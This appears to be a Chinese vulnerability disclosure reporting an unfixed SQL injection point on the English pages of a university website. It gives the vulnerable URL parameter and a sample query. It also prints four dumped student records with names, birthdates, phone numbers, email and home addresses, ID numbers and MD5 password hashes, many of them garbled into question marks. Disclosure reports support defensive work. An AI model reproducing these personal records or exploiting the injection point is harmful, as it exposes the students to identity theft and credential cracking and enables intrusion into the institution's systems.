看案例http://**.**.**.**/bugs/wooyun-2015-0146585
上面写着注入点已经修复了,但是忽略了英文版的
问题链接:http://**.**.**.**/en/People/Professor/individual.php?TeacherID=T8166
dba权限。数据库有32个,影响很大
看以上数据库名就知道有的库与课程、考试相关,所以比较重要。下面这个表里基本都是师生的信息,包含密码联系方式地址等信息:
举例:select * from master2015 limit 4 [4]:
[*] ?????????7????89?(??????74?), ??????, , 1993/2/16,, , ??????, , , ????????277?2?7?3?A?, , yschan.ee03g@**.**.**.**, ??, 2015/2, N/A/N/A, , , 0350306, , 54208, **.**.**.**, 2015-10-28 21:01:33, , , , 103B?????9????????, ???, Yun-Sheng, Chan, , , , , N/A/N/A/N/A, 08b7c48d98079497ce5deadac7114dbe, 0912082581, , 00911420049815, yes, flydream56@**.**.**.**, , ?????0919355465, ?, , ??????, ??????,
[*] ????????????107?, ???, , 1991/1/14, , ?????????????, , , ????????114?, 0910993621, jhblueboy@**.**.**.**, ??, 2015/2, N/A/N/A, , 08-7693096, 0350299, , 54205, **.**.**.**, 2015-10-28 21:05:54, , , , , ???, Min-Han, Lee, , , , , N/A/N/A/N/A, a6ba5c1753e238481b40306f6202d1dc, 0910993621, , 00713350706464, yes, minhanleetw@**.**.**.**, , 104A~105B??, ?, , ?????, ????,
[*] ?????????12??????329?4?17?2?, ???, , 1992/4/12, ,??????, , , ??????1001?_?????????401, 0952068599, daniel70589@**.**.**.**, ??, 2015/2, N/A/N/A, , 0287912221, 0350300, , 54247, **.**.**.**, 2015-09-11 18:17:47, , , , , ???, Hao-Hsiang, Yu, , , , , N/A/N/A/N/A, 33e35e29f2901f8f4d6e20b4126f191d, 0952068599, , 00025970045784, , daniel70589@**.**.**.**, , , ?, , ??????, ??????,
[*] ?????????????87?, ???, , 1992/10/16, , ?????, , , ????????277?2?50?2?B?, 0986915781, fubin1016.ee03g@g2.**.**.**.** , ??, 2015/2, N/A/N/A, , 06-2462707, 0350301, , (03) 5712121 x54199, **.**.**.**, 2015-09-21 07:20:01, , , , , ???, Fu-Bin, Yang, , , , , N/A/N/A/N/A, 3ed91e6e9c60d0f2f135329d52d74763, 0986915781, 0350301.jpg, 00312970308128, , fubin1016@**.**.**.**, , , ?, , ??????, ????????,
教师表:
内容我就不一一看了。